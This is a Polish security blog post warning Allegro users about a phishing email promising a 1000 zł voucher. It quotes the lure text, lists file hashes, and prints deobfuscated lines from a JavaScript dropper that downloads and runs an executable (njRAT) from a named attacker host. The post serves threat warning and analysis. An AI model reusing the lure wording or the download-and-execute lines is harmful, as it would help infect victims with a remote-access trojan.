Uwaga na atak: Ticket #173 – Rekomenstana zwrot 1000zl jako zadoscuczynienie.

dodał 11 listopada 2018 o 13:06 w kategorii Złośniki  z tagami:
Uwaga na atak: Ticket #173 – Rekomenstana zwrot 1000zl jako zadoscuczynienie.

W ostatnich tygodniach widzimy znaczący wzrost ataków na użytkowników Allegro. Scenariuszy jest wiele – od wyłudzania haseł po instalację złośliwego oprogramowania. Poniżej opisujemy najnowszy pomysł internetowych oszustów.

Wśród setek złośliwych e-maili, które codziennie widzimy, przeważają wiadomości już dobrze nam znane. Wiele grup przestępców przez wiele tygodni, a czasem nawet miesięcy, wysyła identyczne e-maile z identycznymi załącznikami, nie starając się w ogóle zadbać o odświeżenie swojej oferty. Czasem jednak zdarzają się nowe inicjatywy, które warto opisać, by ostrzec internautów.

Ticket #173 – Rekomenstana zwrot 1000zl jako zadoscuczynienie.

Temat wiadomości pokazuje niechlujność atakujących – z reguły lepiej dbają o treść swoich ataków. Sama wiadomość wygląda następująco:

Witaj (tu adres odbiorcy),

Zgodnie z naszymi procedurami przyznalismy Tobie w ramach zwrotu, voucher na kwote 1.000zl do wydania w serwisie allegro.

twój kupon znajduje sie w zalaczniku!

Czekamy na Ciebie!

Do wiadomości dołączony jest plik

Karta Podarunkowa.z
d67dfc63aba158632ab3987a80a8a05280f30ab1c9cab36c908df4e82e7dccaf
https://www.virustotal.com/#/file/d67dfc63aba158632ab3987a80a8a05280f30ab1c9cab36c908df4e82e7dccaf/

zawierający w archiwum plik

zalacznik.PDF.js
6b7ba9765755d44c9f7d515502e65e15d95edea4997651288ff4b7d374792e3c
https://www.virustotal.com/#/file/ad5832056e4f94846d00b01fc6aec0163bb7f2c62c0a1cc384041941a5536cf6/

Złośliwy plik JS jest zaciemniony, ale daje się łatwo odczytać. Zawiera takie ciągi:

DfL('http://kapitanbomba.hopto.org/file.exe', foul + '\\file.exe');
DfLPDF('http://kapitanbomba.hopto.org/file.pdf', foul + '\\file.pdf');
RunExe();
RunPDF();

Plik PDF jest pusty i najwyraźniej niegroźny (zapewne ma udawać błędny załącznik), z kolei plik EXE jest pełny zła i zdecydowanie groźny:

file.exe
ad5832056e4f94846d00b01fc6aec0163bb7f2c62c0a1cc384041941a5536cf6
https://www.virustotal.com/#/file/ad5832056e4f94846d00b01fc6aec0163bb7f2c62c0a1cc384041941a5536cf6/

Jest to koń trojański znany jako njRAT lub Bladabindi. Korzysta z tego samego serwera, z którego jest pobierany:

kapitanbomba.hopto.org
108.62.118.179

Ataki z użyciem tego serwera i złośliwego oprogramowania prawdopodobnie trwają co najmniej od dwóch dni, jednak mała liczba zgłoszeń wskazuje, że jest to raczej kampania celowana w konkretne ofiary.

Dziękujemy Czytelnikom, którzy zgłosili kampanię – Ty też możesz pomóc!